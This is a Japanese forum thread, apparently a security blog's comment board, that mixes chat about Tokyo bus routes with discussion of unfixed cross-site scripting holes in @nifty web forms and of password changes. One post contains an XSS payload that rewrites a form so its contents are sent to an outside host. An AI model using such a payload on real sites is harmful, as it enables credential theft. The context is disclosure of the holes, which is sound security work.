新生鳩丸掲示板♯

>typeというより、listと思い込んでるんじゃないでしょうか。

　うーん、きっとそうなんでしょうね……。

　これが実は某大手企業のイントラ……あわわわわ。

typeというより、listと思い込んでるんじゃないでしょうか。lintという単語を知らないとか。

連続ですみません。

> 私は西武バスではこういう目に遭ったことはなく、むしろ運転手さんが「座ってください」と注意を促す場面を良く目にします。

私も西武バスに乗ったときに「座ってください」と言われたことがあります。たしか立39-2系統だったと思います。一日に数本しか運行されないレアな路線です。

> ※なお、乗るときにカードを通せなかった場合、降りるときに乗ったバス停の名前を告げれば OK。

私は、カードを通せそうに無いときは整理券を取っておいて降りるときに整理券番号を申告しています。

> これに遭ったのは都営バスの「梅70」という路線です。

おお、懐かしい路線だ。昔、ほんの一部の区間だけですが乗ったことがあります。具体的な乗車区間は http://kkd.zive.net/train を参照。

梅70は青梅車庫～箱根ヶ崎駅～東大和市駅～小平駅～柳沢駅というかなりの長距離路線ですね。おそらく都バスの中では最長ではないかと思われるくらい。

はてなアンテナって、どっか登録しようとしてそれがどっかの誰かにすでに登録されている場合は同じの使ってYO!というアラートが出て、素直なら(謎)その同じのを使うように設定すると思うんで、登録された数だけっていうのは、ちょっと違うような気もしますが、まあ実際どういう感じでロボッツが回ってんのか知らんので、まあそこんとこヨロポク(謎)。

>念のためパスワード変更しておこっと。

　よく考えたら、私のもパケット盗聴で漏れてる可能性ありますね。

# 捏造フォームの送信先は https ではなかったし。

　パスワード変えとこ……。

>あわわ、なんかログインパスワードのみ変更ってのがあるんだけど、これでいいのかな。何かもう色々忘れちゃったよ。

　ログインパスワードと POP3 のパスワードが別々になっているようですね。いつのまにやら。

あわわ、なんかログインパスワードのみ変更ってのがあるんだけど、これでいいのかな。何かもう色々忘れちゃったよ。

>>パスワードってどうやって変更するのだっけ。

>

>　TTY なら GO PASSWORD です。

>　Web上ではパスワード変更を行いたくない気がする今日この頃。

そう言われましても【謎】会員種別を@nifty会員に変更してしまったのでどうしようもありません【謎】。

あ、戻せばいいのか【謎】。スパムメーブロックは結局役に立たなかったし。

>>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

>>　うおっと。

>>　とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。

>

>パスワードってどうやって変更するのだっけ。

https://www.nifty.com/webscr/cgi-bin/pwget.cgi

残念ながら【謎】XSSはなさげです。

>パスワードってどうやって変更するのだっけ。

　TTY なら GO PASSWORD です。

　Web上ではパスワード変更を行いたくない気がする今日この頃。

>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

>　うおっと。

>　とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。

パスワードってどうやって変更するのだっけ。

>話題「**」を含むえび日記（に限らず、過去ログというもの全般にいえることですが）は、記事の順番が逆（古いものから新しいものへ）の方が読みやすいと思うのですが、いかがでしょうか。

　あー、そうかも知れません。

　ということで逆にしてみました。

話題「**」を含むえび日記（に限らず、過去ログというもの全般にいえることですが）は、記事の順番が逆（古いものから新しいものへ）の方が読みやすいと思うのですが、いかがでしょうか。

>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

　うおっと。

　とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。

私のじゃないやつって、僕のかも。

セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

念のためパスワード変更しておこっと。

>で、結局まだ沢山残ってるんですね？

　実は私はあんまり調べてないのですが、office さんがそれなりに精力的に調査してくださったようで、3ヶ所ほど発見されています。いずれも未修整で、うち一つは SSL 保護つきのログインフォームです。先日の DOM 使用例はそこできっちり動作しました。

　これについてニフティが把握しているかどうかは分かりません。全フォームについて調査していると思うので、気づくだろうとは思うのですが……。

いやいや、明快、明快、実に解りやすい。

で、結局まだ沢山残ってるんですね？

といっても28日までにまだ2.5日ありますが。う～ん、おまけして７月までにと延ばしてあげましょう。NIFTYさん。

"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span

>>なぜかここに投稿しようとするとエラーになるので

　調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。

================

危険な可能性のある Request.Form 値がクライアントから検出されました。

説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。

例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。

================

　この機能はオフにできるはずなので、ちょっと調べてみます。